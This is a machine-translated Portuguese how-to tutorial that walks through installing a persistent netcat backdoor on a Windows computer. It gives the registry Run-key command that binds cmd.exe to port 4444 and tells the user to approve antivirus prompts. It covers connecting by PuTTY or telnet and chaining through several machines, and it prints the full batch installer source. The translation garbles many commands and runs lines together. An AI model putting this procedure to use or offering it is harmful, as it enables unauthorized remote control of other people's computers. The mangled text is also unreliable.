Netcat Fun !: 5 etapas

2024 Autor: John Day | [email protected]. Última modificação: 2024-01-30 11:39

Este instrutível mostra como criar um backdoor em um computador com netcat! Mostrarei duas maneiras de fazer isso, com e sem meu arquivo em lote que o automatiza para você. Este instrutível já assume que você já tem permissões de root no computador, provavelmente com um LiveCD 0phcrack aqui. Agora, para o instrutível.

Etapa 1: Baixe o Netcat

Eu salvei você do trabalho de 3 minutos de pesquisa no Google e coloquei o nc.exe no instructables para você baixar. Opcionalmente, você também pode baixar nc.bat, que é um arquivo em lote que criei para automatizar o processo para você. Certifique-se de que se você baixar nc.bat ele tem 464 bytes, porque eu continuei enviando versões e descobrindo que havia algo de errado com ele. Se não for 464 bytes, o programa não corresponderá a este instrutível.

Etapa 2: com Nc.bat

Primeiro, os dois arquivos devem estar no mesmo diretório para que o nc.bat funcione corretamente. Eu sugiro usar uma unidade flash ou CD-ROM para esta operação. Usei um flash drive de 512 MB do geek squad para isso, mas sou só eu. Portanto, copie os arquivos em seu dispositivo de mídia externo e traga-os para o computador em que você fez o root. Pegue o dispositivo de mídia e clique duas vezes em nc.bat. Isso copiará o arquivo nc.exe para a pasta system32, na raiz do sistema (geralmente C: / Windows ou C: / WINNT) e fará as alterações necessárias no registro. Em seguida, anote o endereço IP. Será algo como '192.168.1.103', que é meu. Feito isso, reinicie a máquina e faça o login. Em seguida, o programa antivírus pode perguntar se você deseja permitir / proibir o programa. Clique em 'Permitir' ou similar. Lembre-se de que, neste instrutível, você só pode fazer telnet a partir da rede local desse computador. Em seguida, saia ou faça logoff ou o que mais quiser.

Etapa 3: sem Nc.bat

Para fazer isso, você deve ter nc.exe em um CD ou unidade Flash. Vá até o computador, faça o login e conecte a unidade flash ou coloque o CD. A partir daqui, há duas maneiras: As interfaces gráficas de usuário aprimoradas do Windows ou a maneira suja e antiquada do prompt de comando. A maneira suja e antiquada do prompt de comando: Puxe o prompt de comando indo para StartRun e digite:

cmd.exeNavegue até o flash ou unidade de CD. Se você não sabe qual unidade é qual, clique com o botão direito do mouse no botão Iniciar e clique em explorar. Clique em todas as unidades não locais em Meu computador até chegar à unidade flash / CD. Lembre-se da letra da unidade e volte ao prompt de comando. Digite a letra da unidade seguida de dois-pontos, assim: K: Em seguida, digite uma linha de cada vez, pressionando a tecla Enter

copiar nc.exe% systemroot% / system32 / nc.exereg adicionar HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "Isso foi basicamente a instalação. Tudo que você precisa saber agora é o endereço IP local, que pode ser facilmente encontrado digitando o comando 'ipconfig' e procurando algo na tabela como "192.168.1.103". Em seguida, reinicie a máquina e faça login novamente. O programa antivírus pode perguntar se você deseja permitir / proibir. Clique em permitir. Então você está livre para fazer o que quiser com o computador. As interfaces gráficas aprimoradas do WindowsClique com o botão direito do mouse no botão iniciar e clique em explorar. Clique em todas as unidades não locais em Meu computador até chegar à unidade flash / CD. Em seguida, clique com o botão direito do mouse em nc.exe e copie. Em seguida, vá para a unidade C e clique na pasta Windows ou WINNT. Em seguida, vá para a pasta system32 e cole nc.exe. Feche isso e vá para StartRun. Digite regedit. Navegue pelas pastas até: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run; em seguida, clique com o botão direito em um espaço vazio e vá para NewString Value. Digite o que quiser para o nome, mas para o valor, digite

% systemroot% / system32 / nc.exe -L -d -p 4444 -t -e cmd.exeEssa foi basicamente a instalação. Tudo que você precisa saber agora é o endereço IP local, que pode ser facilmente encontrado digitando o comando 'ipconfig' no prompt de comando (StartRun: cmd.exe) e procurando por algo na tabela como "192.168.1.103". Em seguida, reinicie a máquina e faça login novamente. O programa antivírus pode perguntar se você deseja permitir / proibir. Clique em permitir. Então você está livre para fazer o que quiser com o computador.

Etapa 4: voltando

Depois de instalá-lo e desejar assumir o controle do host, abra o prompt de comando ou PuTTY. Eu acho o PuTTY incrível, então vou deixar você baixá-lo aqui. Using PuTTYDownload and open PuTTY.exe. Clique no protocolo 'bruto'. Na caixa de texto da porta #, digite 4444. Na caixa 'endereço do host', digite o endereço IP que você anotou durante a instalação. Em seguida, pressione Enter. O PuTTY deve se conectar à caixa e você obterá um prompt de comando. Usando o Prompt de comandoAbra o prompt de comando e digite 'telnet 4444'. Em seguida, pressione Enter e você deverá obter um prompt de comando. Isso permitirá que você faça quase tudo o que quiser no computador remotamente, que pode ser feito com uma conta local. Realmente começa a ficar interessante quando você entra em um computador e depois em outro a partir desse computador, para conectar uma cadeia inteira de computadores. Divirta-se (legalmente)!

Etapa 5: Código Fonte

Como fui solicitado, colocarei o código-fonte (para o arquivo em lote) e explicarei cada comando e o que ele faz. Estar ciente! Esta é a versão atual do programa de instalação em lote. Se o seu for diferente, o código será diferente.

@echo offcopy nc.exe% systemroot% / system32 / nc.exeif errorlevel 0 goto regeditgoto erro: regeditreg add HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "se errorlevel 0 goto ip: errorecho algo inesperado ocorreu e o programa precisa sair.goto end: ipecho anote o endereço IP do tableipconfig: endecho end.echo fita adesiva out.pause@echo off-Diz para não mostrar os comandos ao executar.copy nc.exe% systemroot% / system32 / nc.exe-geralmente copia netcat em C: / WINDOWS / system32. Isso faz com que quando você voltar, em vez de mudar de diretório o tempo todo, você pode simplesmente digitar "nc" para abrir outro port.if errorlevel 0 goto regedit-error checking. Se a cópia foi bem-sucedida, ele edita o erro registry.goto-Se ocorreu um erro, vá para: rótulo de erro.:regedit- Um rótulo, especificando que quando o programa disser "goto regedit", vá aqui.reg adicionar HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" - (supostamente ser uma linha) que adiciona a chave de registro para reiniciar o programa quando reinicializado. / f significa sobrescrever a chave existente, / v para o nome da chave, / d para os dados. O resto das tags são inseridas para netcat. -L diz para reiniciá-lo ao sair, para que você não precise esperar que o computador reinicie. -eu esqueci. -p 4444 especifica a porta #. -Eu esqueci. -e cmd.exe faz com que o prompt de comando seja iniciado em conexão remota. if errorlevel 0 goto ip-error checking. Se a execução desse errado, ele pularia esta linha e iria para o: error label.echo algo inesperado ocorreu e o programa precisa ser encerrado. - diz ao programa para imprimir "algo inesperado ocorreu e o programa precisa ser encerrado "na tela.goto fim-se foi para a mensagem de erro, algo deu errado e o programa precisa ser fechado de qualquer maneira.:ip- Mais uma vez, label.echo anote o endereço IP da tabela-Grava" anote o IP endereço da tabela "para a tela.ipconfig-Este é um comando que imprime informações sobre as configurações de sua rede local (LAN).:end-Label.echo end.-grava" fim "na tela.echo fora da fita adesiva. - grava "fita adesiva" na tela. pausa - este comando pausa o programa e espera que o usuário pressione uma tecla. Neste programa, ele espera pela entrada e, em seguida, sai do programa.